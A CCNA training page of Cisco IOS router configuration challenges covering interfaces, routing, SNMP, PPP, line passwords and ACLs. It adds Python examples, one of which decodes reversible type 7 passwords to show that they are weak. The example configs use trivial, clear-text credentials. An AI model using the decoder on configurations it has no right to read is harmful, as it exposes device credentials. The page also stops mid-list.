
NetworkSims.com
Web: http://networksims.com
Contact: support@networksims.com

CCNA

Cisco Router Challenge 1


Outline
This challenge involves the configuration of the E0 port on a router.
Objectives
The objectives of this challenge are to:
Set up the IP address on the E0 port.
Set up the subnet mask on the E0 port.
Enable the E0 port.
Set the description for the E0 port.
Define the speed of the E0 port.
Define duplex on the E0 port.
Define a host table.

Example
> enable
# config t
(config)# hostname mars
mars (config)# ip domain-n ?
WORD Default domain name
mars (config)# ip domain-name fred.co
mars (config)# int e0
mars (config-if)# ?
Interface configuration commands:
access-expression
Build a bridge boolean access expression
arp
Set arp type (arpa, probe, snap) or timeout
backup
Modify backup parameters
bandwidth
Set bandwidth informational parameter
bgp-policy
Apply policy propogated by bgp community string
bridge-group
Transparent bridging interface parameters
carrier-delay
Specify delay for interface transitions
cdp
CDP interface subcommands
clns
CLNS interface subcommands
cmns
OSI CMNS
crypto
Encryption/Decryption commands
custom-queue-list
Assign a custom queue list to an interface
dampening
Enable event dampening
default
Set a command to its defaults
delay
Specify interface throughput delay
description
Interface specific description

diffserv
diffserv (Provisioning)
dot1q
dot1q interface configuration commands
dot1x
Interface Config Commands for 802.1x
duplex
Configure duplex operation.
exit
Exit from interface configuration mode
fair-queue
Enable Fair Queuing on an Interface
flow-sampler
Attach flow sampler to the interface
full-duplex
Configure full-duplex operational mode
glbp
Gateway Load Balancing Protocol interface commands
half-duplex
Configure half-duplex and related commands
help
Description of the interactive help system
hold-queue
Set hold queue depth
ip
Interface Internet Protocol config commands
isis
IS-IS commands
iso-igrp
ISO-IGRP interface subcommands
keepalive
Enable keepalive
llc2
LLC2 Interface Subcommands
load-interval
Specify interval for load calculation for an interface
logging
Configure logging for interface
loopback
Configure internal loopback on an interface
mac-address
Manually set interface MAC address
max-reserved-bandwidth Maximum Reservable Bandwidth on an Interface
mls
mls interface commands
mop
DEC MOP server commands
mtu
Set the interface Maximum Transmission Unit (MTU)
netbios
Use a defined NETBIOS access list or enable
name-caching
no
Negate a command or set its defaults
ntp
Configure NTP
pagp
PAgP interface subcommands
pppoe
pppoe interface subcommands
pppoe-client
pppoe client
priority-group
Assign a priority group to an interface
random-detect
Enable Weighted Random Early Detection (WRED) on an
Interface
rate-limit
Rate Limit
roles
Specify roles (by entering roles mode)
service-policy
Configure QoS Service Policy
shutdown
Shutdown the selected interface
snapshot
Configure snapshot support on the interface
snmp
Modify SNMP interface parameters
speed
Configure speed operation.
standby
HSRP interface configuration commands
tarp
TARP interface subcommands
timeout
Define timeout values for this interface
traffic-shape
Enable Traffic Shaping on an Interface or
Sub-Interface
transmit-interface
Assign a transmit interface to a receive-only
interface
trunk-group
Configure interface to be in a trunk group
tx-ring-limit
Configure PA level transmit ring limit
vlan-id
Process VLAN-encapsulated packets with a specific
VLAN ID
vlan-range
Process VLAN-encapsulated packets with a range of
VLAN IDs
vrrp
VRRP Interface configuration commands
mars (config-if)# ip address 36.109.222.1 255.255.255.128
mars (config-if)# no shutdown
mars (config-if)# description testing123
mars (config-if)# speed ?
10
Force 10 Mbps operation
100
Force 100 Mbps operation

auto Enable AUTO speed configuration
mars (config-if)# speed 10
mars (config-if)# duplex ?
auto Enable AUTO duplex configuration
full Force full duplex operation
half Force half-duplex operation
mars (config-if)# duplex half
mars (config-if)# exit
mars (config)# ip host ?
WORD Name of host
mars (config)# ip host oregon ?
<0-65535>
Default telnet port number
A.B.C.D
Host IP address
additional Append addresses
mars (config)# ip host oregon 200.150.174.6
mars (config)# ip host idaho 192.49.172.8
mars (config)# ip host montana 99.33.235.9
(config)# exit
# sh running

Cisco Router Challenge 2


Outline
This challenge involves setting up the serial port parameters.
Objectives
The objectives of this challenge are to:
Set up the IP address on the S0 port.
Set up the subnet mask on the S0 port.
Enable the S0 port.
Set the description for the S0 port.
Set up the IP address on the S1 port.
Set up the subnet mask on the S1 port.
Enable the S1 port.
Set the description for the S1 port.

Example
> enable
# config t
(config)# int s0
(config-if)# ?
Interface configuration commands:
access-expression
Build a bridge boolean access expression
appletalk
Appletalk interface subcommands
arp
Set arp type (arpa, probe, snap) or timeout
autodetect
Autodetect Encapsulations on Serial interface
backup
Modify backup parameters
bandwidth
Set bandwidth informational parameter

bridge-group
Transparent bridging interface parameters
carrier-delay
Specify delay for interface transitions
cdp
CDP interface subcommands
clock
Configure serial interface clock
compress
Set serial interface for compression
custom-queue-list
Assign a custom queue list to an interface
dce-terminal-timing-enable
Enable DCE terminal timing
decnet
Interface DECnet config commands
default
Set a command to its defaults
delay
Specify interface throughput delay
description
Interface specific description
dialer
Dial-on-demand routing (DDR) commands
dialer-group
Assign interface to dialer-list
down-when-looped
Force looped serial interface down
dxi
ATM-DXI configuration commands
encapsulation
Set encapsulation type for an interface
exit
Exit from interface configuration mode
fair-queue
Enable Fair Queuing on an Interface
full-duplex
Configure full-duplex operational mode
half-duplex
Configure half-duplex and related commands
help
Description of the interactive help system
hold-queue
Set hold queue depth
idle-character
Set idle character type
ignore
ignore signals
ignore-dcd
ignore dcd
ignore-hw
ignore a serial signal
invert
Serial invert modes
ip
Interface Internet Protocol config commands
ipx
Novell/IPX interface subcommands
keepalive
Enable keepalive
line-power
Provide power on the line.
llc2
LLC2 Interface Subcommands
load-interval
Specify interval for load calculation for an interface
logging
Configure logging for interface
loopback
Configure internal loopback on an interface
mac-address
Manually set interface MAC address
max-reserved-bandwidth
Maximum Reservable Bandwidth on an Interface
mop
DEC MOP server commands
mtu
Set the interface Maximum Transmission Unit (MTU)
multilink-group
Put interface in a multilink bundle
netbios
Use a defined NETBIOS access list or enable name-caching
network-clock-priority
Configure clock source priority
no
Negate a command or set its defaults
nrzi-encoding
Enable use of NRZI encoding
ntp
Configure NTP
physical-layer
Configure sync or async physical layer on serial interface
ppp
Point-to-Point Protocol
priority-group
Assign a priority group to an interface
pulse-time
Force DTR low during resets
random-detect
Enable Weighted Random Early Detection (WRED) on an Interface
rate-limit
Rate Limit
serial
serial interface commands
service-policy
Configure QoS Service Policy
shutdown
Shutdown the selected interface
smds
Modify SMDS parameters
smrp
Simple Multicast Routing Protocol interface subcommands
snapshot
Configure snapshot support on the interface
snmp
Modify SNMP interface parameters
source
Get config from another source
timeout
Define timeout values for this interface
traffic-shape
Enable Traffic Shaping on an Interface or Sub-Interface
transmit-interface
Assign a transmit interface to a receive-only
interface
transmitter-delay
Set dead-time after transmitting a datagram
trunk-group
Configure interface to be in a trunk group
tx-ring-limit
Configure PA level transmit ring limit
(config-if)# ip address 160.52.39.9 255.248.0.0
(config-if)# no shutdown
(config-if)# description management
(config-if)# carrier-delay ?
<0-60> Carrier Transitions delay seconds
msec
delay specified in milliseconds
(config-if)# carrier-delay 5
(config-if)# int s1
(config-if)# ip address 96.71.75.7 255.255.248.0
(config-if)# no shutdown
(config-if)# description production depart
(config-if)# carrier-delay 6
(config-if)# end
# sh running

Cisco Router Challenge 3


Outline
This challenge involves the configuration of the name server, user names and passwords. Note the difference between the two enable forms shown below: enable secret is stored as a salted hash and takes precedence, while enable password is kept in clear text in the configuration (or in the reversible type 7 form if service password-encryption is on). The same distinction applies to username ... password against username ... secret.
Objectives
The objectives of this challenge are to:
Set up the name server.
Set up the privileged (enable) password and secret.
Set up a username and password.

Example
> enable
# config t
(config)# ip name-server 51.16.207.1
(config)# ena ?
last-resort Define enable action if no TACACS servers respond
password
Assign the privileged level password
secret
Assign the privileged level secret
use-tacacs
Use TACACS to check enable passwords
(config)# enable password default1
(config)# enable secret ankle
(config)# username bunty ?
access-class
Restrict access by access-class
autocommand
Automatically issue a command after the user logs in
callback-dialstring Callback dialstring

callback-line
Associate a specific line with this callback
callback-rotary
Associate a rotary group with this callback
dnis
Do not require password when obtained via DNIS
nocallback-verify
Do not require authentication after callback
noescape
Prevent the user from using an escape character
nohangup
Do not disconnect after an automatic command
nopassword
No password is required for the user to log in
password
Specify the password for the user
privilege
Set user privilege level
secret
Specify the secret for the user
user-maxlinks
Limit the user's number of inbound links
view
Set view name
<cr>
(config)# username bunty password apple
(config)# exit
# sh running

Cisco Router Challenge 4


Outline
This challenge involves the configuration of the interface ports.
Objectives
The objectives of this challenge are to:
Set up the domain name.
Define the hostname.
Enable the interface ports.

Example
> enable
# config t
(config)# ip domain-name work.org
(config)# hostname wyoming
wyoming (config)# int e0
wyoming (config-if)# no shutdown
wyoming (config-if)# int s0
wyoming (config-if)# no shutdown
wyoming (config-if)# int s1
wyoming (config-if)# no shutdown
wyoming (config-if)# end
# sh running

Cisco Router Challenge 5


Outline
This challenge involves the configuration of banners and the HTTP server. The plain ip http server listens for unencrypted HTTP, so management logins to it cross the network in clear text; the help output below also lists ip http secure-server (HTTPS) and ip http access-class, which limits the addresses allowed to reach the server at all.
Objectives
The objectives of this challenge are to:
Define the hostname.
Define the banners.
Enable the HTTP server.

Example
> enable
# config t
(config)# hostname Amsterdam
Amsterdam (config)# banner ?
LINE
c banner-text c, where 'c' is a delimiting character
exec
Set EXEC process creation banner
incoming
Set incoming terminal line banner
login
Set login banner
motd
Set Message of the Day banner
prompt-timeout Set Message for login authentication timeout
slip-ppp
Set Message for SLIP/PPP
Amsterdam (config)# bann mo ?
LINE c banner-text c, where 'c' is a delimiting character
Amsterdam (config)# banner motd #my device#
Amsterdam (config)# banner login #how are you#
Amsterdam (config)# banner exec #main device#
Amsterdam (config)# ip http server
Amsterdam (config)# ip http ?
access-class
Restrict http server access by access-class
authentication
Set http server authentication method
client
Set http client parameters
max-connections
Set maximum number of concurrent http server connections
path
Set base path for HTML
port
Set http server port
secure-ciphersuite Set http secure server ciphersuite
secure-client-auth Set http secure server with client authentication
secure-port
Set http secure server port number for listening
secure-server
Enable HTTP secure server
secure-trustpoint
Set http secure server certificate trustpoint
server
Enable http server
timeout-policy
Set http server time-out policy parameters
Amsterdam (config)# exit
# sh running

Cisco Router Challenge 6


Outline
This challenge involves the configuration of RIP. Note that the network command under router rip is classful: IOS stores the class A, B or C network that contains the address typed, so network 137.205.232.0 is recorded as 137.205.0.0, and RIP is enabled on every interface whose address falls inside that classful network.
Objectives
The objectives of this challenge are to:
Define RIP routing.
Define the associated networks.
Define CDP.
Define IP subnet zero.
Define IP classless.

Example
> enable
# config t
(config)# router ?
bgp
Border Gateway Protocol (BGP)
eigrp
Enhanced Interior Gateway Routing Protocol (EIGRP)
isis
ISO IS-IS
iso-igrp IGRP for OSI networks
mobile
Mobile routes
odr
On Demand stub Routes
ospf
Open Shortest Path First (OSPF)
rip
Routing Information Protocol (RIP)
(config)# router rip
(config-router)# ?
Router configuration commands:
address-family
Enter Address Family command mode
auto-summary
Enable automatic network number summarization
default
Set a command to its defaults
default-information
Control distribution of default information
default-metric
Set metric of redistributed routes
distance
Define an administrative distance
distribute-list
Filter networks in routing updates
exit
Exit from routing protocol configuration mode
flash-update-threshold Specify flash update threshold in second
help
Description of the interactive help system
input-queue
Specify input queue depth
maximum-paths
Forward packets over multiple paths
neighbor
Specify a neighbor router
network
Enable routing on an IP network
no
Negate a command or set its defaults
offset-list
Add or subtract offset from RIP metrics
output-delay
Interpacket delay for RIP updates
passive-interface
Suppress routing updates on an interface
redistribute
Redistribute information from another routing
protocol
timers
Adjust routing timers
traffic-share
How to compute traffic share over alternate paths
validate-update-source Perform sanity checks against source address of
routing updates
version
Set routing protocol version
(config-router)# version 2
(config-router)# network 166.248.0.0
(config-router)# network 200.169.96.0
(config-router)# network 137.205.232.0
(config-router)# exit
(config)# cdp ?
advertise-v2
CDP sends version-2 advertisements
holdtime
Specify the holdtime (in sec) to be sent in packets
log
Log messages generated by CDP
source-interface Insert the interface's IP in all CDP packets
timer
Specify the rate at which CDP packets are sent (in sec)
run
(config)# cdp run
(config)# int e0
(config-if)# cdp ?
enable Enable CDP on interface
log
Log messages generated by CDP
(config-if)# cdp enable
(config-if)# exit
(config)# ip subnet-zero
(config)# ip classless
(config)# exit
# sh running

Cisco Router Challenge 8


Outline
This challenge involves the setting of logging, the clock and HTTP settings. The level given to logging trap, logging console, logging monitor and logging buffered is a threshold rather than a filter for that one level: messages at that severity and anything more severe are logged, so emergency (level 0) keeps only emergency messages and discards everything else.

Objectives
The objectives of this challenge are to:

Setup logging.
Define the clock.
Define HTTP settings.

Example
> enable
# config t
(config)# logging ?
Hostname or A.B.C.D
IP address of the logging host
buffered
Set buffered logging parameters
cns-events
Set CNS Event logging level
console
Set console logging parameters
count
Count every log message and timestamp last occurrence
exception
Limit size of exception flush output
facility
Facility parameter for syslog messages
history
Configure syslog history table
host
Set syslog server IP address and parameters
monitor
Set terminal line (monitor) logging parameters
on
Enable logging to all supported destinations
origin-id
Add origin ID to syslog messages
rate-limit
Set messages per second limit
reload
Set reload logging level
server-arp
Enable sending ARP requests for syslog servers when first configured
source-interface
Specify interface for source address in logging transactions
trap
Set syslog server logging level
(config)# logging on
(config)# logging 212.72.52.7
(config)# logging buffered 440240
(config)# logging host 138.24.170.8
(config)# logging trap emergency
(config)# logging monitor emergency
(config)# logging console emergency
(config)# logging buffered emergency
(config)# clock timezone AKDT -8
(config)# ip http ?
access-class
Restrict http server access by access-class
authentication
Set http server authentication method
client
Set http client parameters
max-connections
Set maximum number of concurrent http server connections
path
Set base path for HTML
port
Set http server port
secure-ciphersuite Set http secure server ciphersuite
secure-client-auth Set http secure server with client authentication
secure-port
Set http secure server port number for listening
secure-server
Enable HTTP secure server
secure-trustpoint
Set http secure server certificate trustpoint
server
Enable http server
timeout-policy
Set http server time-out policy parameters
(config)# ip http server
(config)# ip http max-connections 7
(config)# ip http port 1024
(config)# exit
# sh running

Cisco Router Challenge 9


Outline
This challenge involves the configuration of CDP and the default gateway. Note that login on a VTY line only makes the line prompt for a password; until one is set with password (or login local is used together with username entries) IOS refuses the connection with "Password required, but none set".
Objectives
The objectives of this challenge are to:
Define the default gateway.
Define CDP.
Require login on the VTY lines.

Example
> enable
# config t
(config)# ip default-gateway 139.35.119.5
(config)# cdp ?
advertise-v2 CDP sends version-2 advertisements
holdtime
Specify the holdtime (in sec) to be sent in packets
timer
Specify the rate at which CDP packets are sent (in sec)
run
(config)# cdp run

(config)# cdp holdtime ?
<10-255> Length of time (in sec) that receiver must keep this packet
(config)# cdp timer ?
<5-254> Rate at which CDP packets are sent (in sec)
(config)# cdp holdtime 4
(config)# cdp timer 89
(config)# int e0
(config-if)# cdp enable
(config-if)# exit
(config)# line vty 0 15
(config-line)# login
(config-line)# end
# sh running

Cisco Router Challenge 10


Outline
This challenge involves the configuration of SNMP. The community string is the whole credential for SNMPv1 and v2c and travels in clear text in every request, so keep it read-only, restrict it with an access list (snmp-server community annt RO followed by an ACL number or name), and prefer SNMPv3 users and groups (the user, group and engineID keywords listed below) where the management station supports them.
Objectives
The objectives of this challenge are to:
Define the main parameters for the SNMP server.

Example
> enable
# config t
(config)# snmp-s ?
chassis-id
String to uniquely identify this chassis
community
Enable SNMP; set community string and access privs
contact
Text for mib object sysContact
context
Create/Delete a context apart from default
drop
Silently drop SNMP packets
enable
Enable SNMP Traps or Informs
engineID
Configure a local or remote SNMPv3 engineID
group
Define a User Security Model group
host
Specify hosts to receive SNMP notifications
ifindex
Enable ifindex persistence
location
Text for mib object sysLocation
packetsize
Largest SNMP packet size
queue-length
Message queue length for each TRAP host
system-shutdown
Enable use of the SNMP reload command
tftp-server-list Limit TFTP servers used via SNMP
trap
SNMP trap options
trap-source
Assign an interface for the source address of all traps
trap-timeout
Set timeout for TRAP message retransmissions
user
Define a user who can access the SNMP engine
view
Define an SNMPv2 MIB view
(config)# snmp-server community annt RO
(config)# snmp-server contact steven
(config)# snmp-server location uk
(config)# snmp-server host 78.113.70.11 annt
(config)# snmp-server enable traps
(config)# snmp-server chassis-id paris
(config)# end
# sh running

Cisco Router Challenge 11


Outline
This challenge involves the configuration of the S0 serial port on a router with PPP encapsulation and CHAP authentication. CHAP authenticates the peer with a challenge and a hashed response computed from a shared secret, so the secret itself never crosses the link; the router looks the secret up in a username entry whose name is the peer's hostname.
Objectives
The objectives of this challenge are to:
Set up the IP address and subnet mask on the S0 port.
Enable the S0 port.
Set the description for the S0 port.
Set PPP encapsulation and CHAP authentication on the S0 port.
Set the clock rate, carrier delay and bandwidth on the S0 port.

Example
> enable
# config t
(config)# int s0
(config-if)# ip address 138.199.17.1 255.255.255.248
(config-if)# no shutdown
(config-if)# description students
(config-if)# encapsulation ?
atm-dxi
ATM-DXI encapsulation
frame-relay Frame Relay networks
hdlc
Serial HDLC synchronous
lapb
LAPB (X.25 Level 2)
ppp
Point-to-Point protocol
smds
Switched Megabit Data Service (SMDS)
x25
X.25
(config-if)# encapsulation ppp
(config-if)# ppp ?
accm
Set initial Async Control Character Map
acfc
Options for HDLC Address & Control Field Compression
authentication Set PPP link authentication method
bridge
Enable PPP bridge translation
chap
Set CHAP authentication parameters
ipcp
Set IPCP negotiation options
lcp
PPP LCP configuration
link
Set miscellaneous link parameters
max-bad-auth
Allow multiple authentication failures
multilink
Make interface multilink capable
pap
Set PAP authentication parameters
pfc
Options for Protocol Field Compression

quality
Set minimum Link Quality before link is down
reliable-link
Use LAPB with PPP to provide a reliable link
timeout
Set PPP timeout parameters
use-tacacs
Use TACACS to verify PPP authentications
(config-if)# ppp authentication ?
chap
Challenge Handshake Authentication Protocol (CHAP)
ms-chap Microsoft Challenge Handshake Authentication Protocol (MS-CHAP)
pap
Password Authentication Protocol (PAP)
(config-if)# ppp authentication chap
(config-if)# clock ?
rate Configure serial interface clock speed
(config-if)# clock rate ?
Speed (bits per second)
1200
2400
4800
9600
14400
19200
28800
32000
38400
56000
57600
64000
72000
115200
125000
128000
148000
192000
250000
256000
384000
500000
512000
768000
800000
1000000
1300000
2000000
4000000
8000000
<300-4000000>
Choose clockrate from list above
(config-if)# clock rate 56000
(config-if)# carrier-delay 8
(config-if)# bandwidth 198
(config-if)# no fair-queue
(config-if)# end
# sh running

Cisco Router Challenge 12


Outline
This challenge involves the configuration of the S1 port on a router. The example uses PAP rather than CHAP: PAP sends the username and password across the link in clear text during its two-way handshake, so CHAP should be preferred wherever both ends support it.
Objectives
The objectives of this challenge are to:
Set up the IP address on the S1 port.
Set up encapsulation on the S1 port.
Set up authentication on the S1 port.
Define other S1 parameters.

Example
> enable
# config t
(config)# int s1
(config-if)# ip address 46.187.202.5 254.0.0.0
(config-if)# no shutdown
(config-if)# description academics
(config-if)# encapsulation ppp
(config-if)# ppp authentication pap
(config-if)# clock rate 56000
(config-if)# carrier-delay 2
(config-if)# bandwidth 63
(config-if)# no fair-queue
(config-if)# end
# sh running
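The interface addresses in Challenges 1, 2, 11 and 12 and the RIP network statements in Challenge 6 are the kind of values IOS silently normalises or rejects. The following Python is an added example, not NetworkSims material: it applies the same two checks IOS makes when an ip address command is entered (the mask must be contiguous, and the address must not be the network or broadcast address) and shows the classful network RIP actually records for a network statement. The addresses are taken from the challenges above; the non-contiguous mask used to exercise the rejection path is constructed.

```python
"""Address and mask checks for the `ip address` and RIP `network` values used above.

Added example, not NetworkSims material. Sample addresses come from the
challenges; the non-contiguous mask in the self-test is constructed.
"""
import ipaddress


def mask_prefix_length(mask: str) -> int:
    """Return the prefix length of a dotted-decimal subnet mask.

    Raises ValueError for a non-contiguous mask such as 255.0.255.0: IOS only
    accepts masks that are a run of one-bits followed by zero-bits. The check
    is done on the raw bits rather than through ipaddress, which would accept
    a wildcard (host) mask like 0.0.0.255 as if it meant /24.
    """
    bits = int(ipaddress.IPv4Address(mask))
    inverted = ~bits & 0xFFFFFFFF
    # For a contiguous mask the inverted value is 2**n - 1, so inverted + 1 is a
    # power of two and shares no set bits with inverted.
    if inverted & (inverted + 1):
        raise ValueError(f"Bad mask {mask}: not contiguous")
    return 32 - inverted.bit_length()


def interface_summary(address: str, mask: str) -> dict:
    """Describe the subnet an `ip address A.B.C.D MASK` command would configure.

    Also rejects the network and broadcast addresses, which IOS refuses to put
    on an interface (prefixes of /31 and /32 have no such reserved addresses).
    """
    prefix = mask_prefix_length(mask)
    iface = ipaddress.IPv4Interface(f"{address}/{prefix}")
    net = iface.network
    if prefix <= 30 and iface.ip in (net.network_address, net.broadcast_address):
        raise ValueError(f"Bad mask /{prefix} for address {address}: network or broadcast address")
    usable = net.num_addresses - 2 if prefix <= 30 else net.num_addresses
    return {
        "prefix": prefix,
        "network": str(net.network_address),
        "broadcast": str(net.broadcast_address),
        "usable_hosts": usable,
    }


def classful_network(address: str) -> str:
    """Return the network RIP actually records for a `network` statement.

    RIP network statements are classful: whatever host or subnet address is
    typed, IOS stores the class A, B or C network containing it and enables
    RIP on every interface inside that network.
    """
    first_octet = int(address.split(".")[0])
    if first_octet < 128:
        prefix = 8
    elif first_octet < 192:
        prefix = 16
    elif first_octet < 224:
        prefix = 24
    else:
        raise ValueError(f"{address} is not in a class A, B or C network")
    return str(ipaddress.IPv4Network(f"{address}/{prefix}", strict=False).network_address)


if __name__ == "__main__":
    # Addresses from Challenges 1, 2, 11 and 12 above.
    for addr, mask in [("36.109.222.1", "255.255.255.128"),
                       ("160.52.39.9", "255.248.0.0"),
                       ("96.71.75.7", "255.255.248.0"),
                       ("138.199.17.1", "255.255.255.248"),
                       ("46.187.202.5", "254.0.0.0")]:
        print(addr, mask, interface_summary(addr, mask))
    # RIP network statements from Challenge 6: only the first two survive as typed.
    for net in ("166.248.0.0", "200.169.96.0", "137.205.232.0"):
        print("network", net, "->", classful_network(net))
```

Running the block prints that 254.0.0.0 in Challenge 12 is a legitimate (if unusual) /7 mask, that 160.52.39.9 with 255.248.0.0 lands in 160.48.0.0/13, and that the third RIP statement in Challenge 6 becomes 137.205.0.0.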

Cisco Router Challenge 14


Outline
This challenge involves the configuration of the default gateway and the host table. Note that ip default-gateway is only used while IP routing is disabled on the device (for example after no ip routing, or in boot mode); a router with routing enabled reaches unknown destinations through a default route (ip route 0.0.0.0 0.0.0.0 next-hop) instead.
Objectives
The objectives of this challenge are to:
Set up the default gateway.
Set up the hostname.
Define a host table.

Example
> en
# config t
(config)# ip default-gateway 36.125.171.9
(config)# hostname montana
montana (config)# ip host tennessee 211.99.108.9

montana (config)# ip host kirkcaldy 154.242.2.8


montana (config)# ip host edinburgh 64.2.249.2
montana (config)# exit
# sh running

Cisco Router Challenge 15


Outline
This challenge involves the configuration of CON and VTY settings. A line password set with the password command is stored in clear text in the running configuration (or in the reversible type 7 form that the 7 option in the help below refers to, once service password-encryption is on); login local with per-user username ... secret entries is the stronger choice, and exec-timeout closes idle sessions so an unattended terminal does not stay logged in.
Objectives
The objectives of this challenge are to:
Set up settings for CON.
Set up settings for VTY.

Example
> en
# config t
(config)# line con ?
<0-0> First Line number
(config)# line con 0
(config-line)# pas ?
0
Specifies an UNENCRYPTED password will follow
7
Specifies a HIDDEN password will follow
LINE The UNENCRYPTED (cleartext) line password
(config-line)# password lothian
(config-line)# timeout ?
login Timeouts related to the login sequence
(config-line)# timeout login ?
response Timeout for any user input during login sequences
(config-line)# timeout login response ?
<0-300> Timeout in seconds
(config-line)# timeout login response 19
(config-line)# exec-timeout ?
<0-35791> Timeout in minutes
(config-line)# exec-timeout 11
(config-line)# logging ?
synchronous Synchronized message output
(config-line)# logging synchronous
(config-line)# line vty 0 8
(config-line)# login
(config-line)# password mississippi
(config-line)# timeout login response 12
(config-line)# exec-timeout 10
(config-line)# exit
(config)# exit
# sh running
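Challenge 3 and this challenge both put credentials into the configuration with password rather than secret, and the password ? help above shows the 7 option for the "hidden" form. The following Python is an added example, not NetworkSims material, that makes the difference concrete: it decodes and encodes the type 7 form using the fixed translation key IOS uses for that scheme (the key string and the two-digit seed convention are the documented algorithm, not something taken from this page), and it classifies running-config credential lines by storage type. The configuration excerpt is constructed for the example; it reuses the username fred password bert line from Challenge 51 and the widely published type 7 encoding of "cisco" as a known check value, and the type 5 and type 9 hash strings in it are placeholders rather than real digests.

```python
"""Audit of how IOS stores the passwords configured in Challenges 3 and 15.

Added example, not NetworkSims material. Decodes the reversible type 7 form
and classifies running-config credential lines by storage type.
"""
import re

# Fixed key of the IOS type 7 scheme: each password byte is XORed with one key
# byte, starting at the offset given by the two leading decimal digits.
XLAT = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def decode_type7(encoded: str) -> str:
    """Recover the clear text from a `password 7` / `enable password 7` value."""
    if not re.fullmatch(r"\d{2}(?:[0-9A-Fa-f]{2})*", encoded):
        raise ValueError(f"not a type 7 string: {encoded!r}")
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    return "".join(chr(b ^ ord(XLAT[(seed + i) % len(XLAT)])) for i, b in enumerate(data))


def encode_type7(plain: str, seed: int = 2) -> str:
    """Produce the type 7 form, as `service password-encryption` would store it."""
    body = "".join(f"{ord(c) ^ ord(XLAT[(seed + i) % len(XLAT)]):02X}" for i, c in enumerate(plain))
    return f"{seed:02d}{body}"


# Storage types as they appear after `password` or `secret` in a running config.
STORAGE = {
    "0": "clear text",
    "7": "type 7 (reversible)",
    "5": "type 5 (salted MD5-crypt)",
    "8": "type 8 (PBKDF2-SHA256)",
    "9": "type 9 (scrypt)",
}


def classify_line(line: str):
    """Return (storage type, recovered clear text or None) for a credential line.

    Lines without `password` or `secret` return None. A bare value with no
    type digit is type 0 (clear text), which is how `password lothian` and
    `username fred password bert` are stored while `service password-encryption`
    is off.
    """
    tokens = line.split()
    for keyword in ("password", "secret"):
        if keyword in tokens:
            rest = tokens[tokens.index(keyword) + 1:]
            if len(rest) >= 2 and rest[0] in STORAGE:
                kind, value = rest[0], rest[1]
            elif rest:
                kind, value = "0", rest[0]
            else:
                return None
            if kind == "0":
                return kind, value
            if kind == "7":
                return kind, decode_type7(value)
            return kind, None  # one-way hash: nothing to recover from the config
    return None


def audit_config(config: str):
    """List every credential line as (line, storage type, recovered value)."""
    findings = []
    for raw in config.splitlines():
        result = classify_line(raw.strip())
        if result:
            findings.append((raw.strip(), result[0], result[1]))
    return findings


# Constructed running-config excerpt; the $1$ and $9$ values are placeholders.
SAMPLE_CONFIG = f"""
enable secret 5 $1$salt$placeholderhashvalue
enable password 7 {encode_type7('default1')}
username fred password bert
username bunty secret 9 $9$placeholderscryptvalue
line con 0
 password lothian
line vty 0 8
 password 7 02050D480809
 login
"""

if __name__ == "__main__":
    for line, kind, recovered in audit_config(SAMPLE_CONFIG):
        print(f"{STORAGE[kind]:28} {line!r}", f"-> {recovered!r}" if recovered else "")
```

Only the type 5, 8 and 9 lines survive the audit with nothing recoverable; everything stored with password, including the type 7 lines that service password-encryption produces, comes straight back as clear text, which is why the secret forms are the ones to use.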

Cisco Router Challenge 16


Outline
This challenge involves the configuration of the boot and clock settings. Three cautions apply to the example: clock set expects hh:mm:ss followed by the day, month and year, so 06:25 on its own is an incomplete command; boot system tftp fetches the IOS image over TFTP, which has no authentication or integrity protection, so anyone who can answer on that path can supply the image; and aaa new-model switches every line to AAA as soon as it is entered, so define a local username or an explicit aaa authentication login method list first, or remote access can be locked out.
Objectives
The objectives of this challenge are to:
Set up the local clock.
Define different boot settings.

Example
# clock ?
set Set the time and date
# clock set 06:25
# config t
(config)# ip subnet-zero
(config)# ip classless
(config)# boot system ?
WORD
TFTP filename or URL
flash Boot from flash memory
mop
Boot from a Decnet MOP server
rcp
Boot from a server via rcp
tftp
Boot from a tftp server
(config)# boot system tftp c28.bin
(config)# ip dhcp ?
conflict
DHCP address conflict parameters
database
Configure DHCP database agents
excluded-address
Prevent DHCP from assigning certain addresses
limited-broadcast-address Use all 1's broadcast address
ping
Specify ping parameters used by DHCP
pool
Configure DHCP address pools
relay
DHCP relay agent parameters
smart-relay
Enable Smart Relay feature
(config)# ip dhcp pool ?
WORD Pool name
(config)# ip dhcp pool paris
(config-dhcp)# exit
(config)# aaa ?
new-model Enable NEW access control commands and functions. (Disables OLD commands.)
(config)# aaa new-model

Cisco Router Challenge 17


Outline
This challenge involves the configuration of a standard ACL. A standard ACL tests only the source address of each packet, entries are checked in the order entered and the first match decides, and every list ends with an implicit deny of anything not matched. The second value on a network entry is a wildcard mask (0 bits must match, 1 bits are ignored), not a subnet mask.
Objectives
The objectives of this challenge are to:
Set up a standard ACL.
Set up an ACL to permit and deny a single host.
Set up an ACL to permit and deny a single network.
Set up an ACL to permit everything else.
Apply it on the incoming port of E0.

Example
> en
# config t
(config)# access-list 2 permit host 130.152.162.10
(config)# access-list 2 deny host 193.68.36.8
(config)# access-list 2 permit 207.182.133.0 0.1.255.255
(config)# access-list 2 deny 153.246.194.0 0.0.127.255
(config)# access-list 2 permit any
(config)# int e0
(config-if)# ip access-group 2 in

Cisco Router Challenge 18


Outline
This challenge involves the configuration of a standard ACL.
Objectives
The objectives of this challenge are to:
Set up a standard ACL.
Set up an ACL to permit and deny a single host.
Set up an ACL to permit and deny a single network.
Set up an ACL to deny everything else.
Apply it on the incoming port of S0.

Example
> en
# config t
(config)# access-list 2 permit host 130.152.162.10
(config)# access-list 2 deny host 193.68.36.8
(config)# access-list 2 permit 207.182.133.0 0.1.255.255
(config)# access-list 2 deny 153.246.194.0 0.0.127.255
(config)# access-list 2 deny any
(config)# int s0
(config-if)# ip access-group 2 in

Cisco Router Challenge 19


Outline
This challenge involves the configuration of an extended ACL. Extended ACLs match on protocol, source, destination and (for TCP and UDP) port, and their network entries take wildcard masks, so a /24 is written 0.0.0.255 and not 255.255.255.0.
Objectives
The objectives of this challenge are to:
Define an extended ACL.
Define a host to be allowed.
Define a host to be denied.
Define a network to be allowed.
Define a network to be denied.
Permit everything else.
Apply the ACL onto E0.

Example
> en
# config t
(config)# access-list 105 ?
deny
Specify packets to reject
dynamic Specify a DYNAMIC list of PERMITs or DENYs
permit
Specify packets to forward
remark
Access list entry comment
(config)# access-list 105 permit ?
<0-255> An IP protocol number
ahp
Authentication Header Protocol
eigrp
Cisco's EIGRP routing protocol
esp
Encapsulation Security Payload
gre
